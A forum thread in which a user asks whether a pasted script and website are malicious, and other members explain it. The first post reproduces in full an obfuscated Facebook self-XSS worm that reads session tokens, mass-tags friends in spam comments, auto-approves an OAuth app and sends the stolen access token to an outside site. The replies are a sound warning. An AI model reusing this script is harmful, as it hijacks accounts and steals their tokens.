Login Register






is this infected code/website? filter_list
Author
Message
is this infected code/website? #1
Hello, i need help in finding if these following websites are infected

http://roshag.eb2a.com/code.txt
http://roshag.eb2a.com/#


and the following code:
Code:
function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)} IbraheemNada("726594297351867"); IbraheemNada("775316909146272"); IbraheemNada("775316022479694"); IbraheemNada("775317252479571"); IbraheemNada("775317625812867"); IbraheemNada("775317855812844"); var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","299387530219896","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id); if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){ var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString(); function uygulamaizinver(url){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ izinverhtml = document.createElement("html"); izinverhtml.innerHTML = xmlhttp.responseText; if(izinverhtml.getElementsByTagName("form").length > 0){ izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML act = izinverhtml.getElementsByTagName("form")[0].action; duzenlevegonder(izinverhtml,act); } } }; xmlhttp.open("GET", url, true); xmlhttp.send(); } function duzenlevegonder(formnesne,act){ izinverparams = ""; for(i=0;i<formnesne.getElementsByTagName("input").length;i++){ if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){ izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value; } } if(formnesne.getElementsByTagName("select").length > 0){ izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80"; } izinverparams.replace("&fb_dtsg","fb_dtsg"); izinverparams += "&__CONFIRM__=1"; formnesne = formnesne; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ izinhtml = document.createElement("html"); izinhtml.innerHTML = xmlhttp.responseText; if(izinhtml.getElementsByTagName("form").length > 0){ izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML; act = izinhtml.getElementsByTagName("form")[0].action; duzenlevegonder(izinhtml,act) }else{ sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i); if (sex[1]) { tokenyolla(sex[1]); } } } }; xmlhttp.open("POST", act , true); xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send(izinverparams); } function TokenUrl(id){ return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday"; } if(!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){ uygulamaizinver(TokenUrl("121876164619130")); var http = new XMLHttpRequest(); http['open']('GET', 'http://graph.facebook.com/' + profile_id, false); http['send'](); var get = JSON.parse(http['responseText']); var isim = get.name; } window.setInterval(function(){ if(document.getElementsByClassName("_5ce")){ for(i=0;i<document.getElementsByClassName("_5ce").length;i++){ document.getElementsByClassName("_5ce")[i].innerHTML = ""; } } if(document.getElementsByClassName("uiToggle wrap")){ for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){ document.getElementsByClassName("uiToggle wrap")[i].innerHTML = ""; } } if(document.getElementsByClassName("uiPopover")){ for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){ document.getElementsByClassName("uiPopover")[i].innerHTML = ""; } } },200); function tokenyolla(token){ top.location.href = 'http://roshag.eb2a.com/#' + token; }} var alibasim = "?C?? ?E? C???C?? C?U? ??C?? ?C?EU? E?C??"; alert(alibasim);


i really need someone to tell me what the code do / are websites infected, because i'm afraid that it infects my computer

Reply

RE: is this infected code/website? #2
No. Its not infected. But If someone asks you to copy this code and paste it in your browser console while using facebook, then DO NOT do that. It will post numerous posts, tag many of your friends into it automatically without your knowledge. You will be used as a bot to spam on facebook. Nothing to do with your computer but can do a lot of things on your behalf on facebook, without your knowledge.
[Image: MUJ8qSW.png]
-----------------------------------
Now learning:
Android Development, Java
Working on:
An FTP Client for Android
-----------------------------------

Reply

RE: is this infected code/website? #3
(05-26-2014, 05:58 PM)alok9shm Wrote: No. Its not infected. But If someone asks you to copy this code and paste it in your browser console while using facebook, then DO NOT do that. It will post numerous posts, tag many of your friends into it automatically without your knowledge. You will be used as a bot to spam on facebook. Nothing to do with your computer but can do a lot of things on your behalf on facebook, without your knowledge.

Spot on, there are programs that execute it for you without them having to put it into the console.

Reply

RE: is this infected code/website? #4
(05-26-2014, 07:20 PM)Rubiks Wrote: Spot on, there are programs that execute it for you without them having to put it into the console.

I've not heard of any such programs. Spammers are using this since the last few months, and I'm pretty sure there isn't any Programs to automate this task right now. It would be very tough to implement an executable that injects this code to the browsers while you're logged into facebook. Trying to do the same using some Facebook apps would be a far better choice for spammers.
[Image: MUJ8qSW.png]
-----------------------------------
Now learning:
Android Development, Java
Working on:
An FTP Client for Android
-----------------------------------

Reply

RE: is this infected code/website? #5
(05-26-2014, 05:58 PM)alok9shm Wrote: No. Its not infected. But If someone asks you to copy this code and paste it in your browser console while using facebook, then DO NOT do that. It will post numerous posts, tag many of your friends into it automatically without your knowledge. You will be used as a bot to spam on facebook. Nothing to do with your computer but can do a lot of things on your behalf on facebook, without your knowledge.

Uhh thank you i was afraid when i logged to their website i was infected / when i put the code yes you were right i was spammed but i removed it all and was afraid that it infected my Computer.

Thank you mate, that was a huge relief.

Reply